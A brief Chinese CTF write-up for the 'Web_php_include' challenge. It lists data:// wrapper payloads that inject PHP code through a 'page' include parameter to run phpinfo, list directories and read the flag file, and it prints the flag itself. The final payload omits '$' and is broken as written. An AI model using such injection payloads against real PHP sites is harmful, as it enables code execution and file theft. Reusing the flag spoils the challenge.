攻防世界---Web_php_include

1.题目链接

2.补充知识:

3.构造:执行成功

/?page=data://text/plain,<?php phpinfo()?>

4.构造下面url,得到目录路径

/?page=data://text/plain,<?php echo $_SERVER['DOCUMENT_ROOT']?>

5构造下面url,读取该路径的文件

?page=data://text/plain,<?php print_r(scandir('/var/www')); ?>

6.构造下面url,读取fl4gisisish3r3.php内容。htmlspecialchars($a)在网页上显示文本 。

/?page=data://text/plain,<?php a=file_get_contents('fl4gisisish3r3.php'); echo htmlspecialchars(a); ?>

ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

相关推荐
m0_662577975 分钟前
模板编译期哈希计算
开发语言·c++·算法
m0_662577975 分钟前
C++代码静态检测
开发语言·c++·算法
阿贵---5 分钟前
编译器命令选项优化
开发语言·c++·算法
add45a6 分钟前
分布式计算C++库
开发语言·c++·算法
「QT(C++)开发工程师」8 分钟前
C++并发编程新纪元:线程库、异步操作与泛型Lambda深度解析
开发语言·c++
Du_chong_huan10 分钟前
1.6 面对攻击的网络 | 《计算机网络:自顶向下方法》精读版
网络·安全·php
-许平安-11 分钟前
MCP项目笔记四(Transport)
开发语言·c++·笔记·ai·mcp
Felven11 分钟前
C. Stable Groups
c语言·开发语言
SuperEugene12 分钟前
Vue3 + Element Plus 表单校验实战:规则复用、自定义校验、提示语统一,告别混乱避坑|表单与表格规范篇
开发语言·前端·javascript·vue.js·前端框架
2401_8942419212 分钟前
基于C++的数据库连接池
开发语言·c++·算法